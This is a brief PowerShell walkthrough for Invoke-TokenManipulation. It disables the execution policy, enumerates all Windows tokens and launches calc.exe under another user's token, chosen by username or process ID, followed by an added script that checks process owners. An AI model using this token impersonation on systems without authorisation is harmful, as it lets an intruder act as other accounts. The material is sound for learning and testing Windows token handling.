Dropping privileges with Invoke-TokenManipulation
Enumerate all tokens
PS C:\Users\SMC> Get-ExecutionPolicy
Restricted
PS C:\Users\SMC> Set-ExecutionPolicy Unrestricted
PS C:\Users\SMC\Desktop> Import-Module .\Invoke-TokenManipulation.ps1
PS C:\Users\SMC\Desktop> Invoke-TokenManipulation -Enumerate
Drop privileges by specifying a username
Invoke-TokenManipulation -CreateProcess "calc.exe" -Username "DESKTOP-2SLO69L\keke"
Drop privileges by specifying a process
Invoke-TokenManipulation -CreateProcess "calc.exe" -Processid "4488"
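Checking the result of the steps above: the following is an added example, not part of the original page or of Invoke-TokenManipulation. It reports which account owns each running instance of a given image, so you can confirm the new process really runs under the lower-privileged user. The function name Get-ProcessOwner and its parameter are hypothetical names chosen for this example.

```powershell
# Added example: list the owning account of every running process with a given image name.
# Get-ProcessOwner is a hypothetical helper name, not a built-in cmdlet.
function Get-ProcessOwner {
    param(
        [Parameter(Mandatory)]
        [string]$Name   # image name as passed to -CreateProcess, e.g. 'calc.exe'
    )

    # Filter client-side so the name is never interpolated into a WQL query string.
    Get-CimInstance -ClassName Win32_Process |
        Where-Object { $_.Name -eq $Name } |
        ForEach-Object {
            # GetOwner returns ReturnValue 0 on success, plus Domain and User.
            $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner

            if ($owner.ReturnValue -eq 0) {
                $account = '{0}\{1}' -f $owner.Domain, $owner.User
            } else {
                # Non-zero usually means the caller may not query this process.
                $account = '<unavailable, code {0}>' -f $owner.ReturnValue
            }

            [pscustomobject]@{
                ProcessId = $_.ProcessId
                ParentId  = $_.ParentProcessId
                SessionId = $_.SessionId
                Name      = $_.Name
                Owner     = $account
            }
        }
}

# Compare the Owner column with the account given to -Username,
# or with the owner of the process given to -ProcessId.
Get-ProcessOwner -Name 'calc.exe' | Format-Table -AutoSize
```

If no rows come back, the image may have exited or handed off to another process; query the name of the process that is actually running instead.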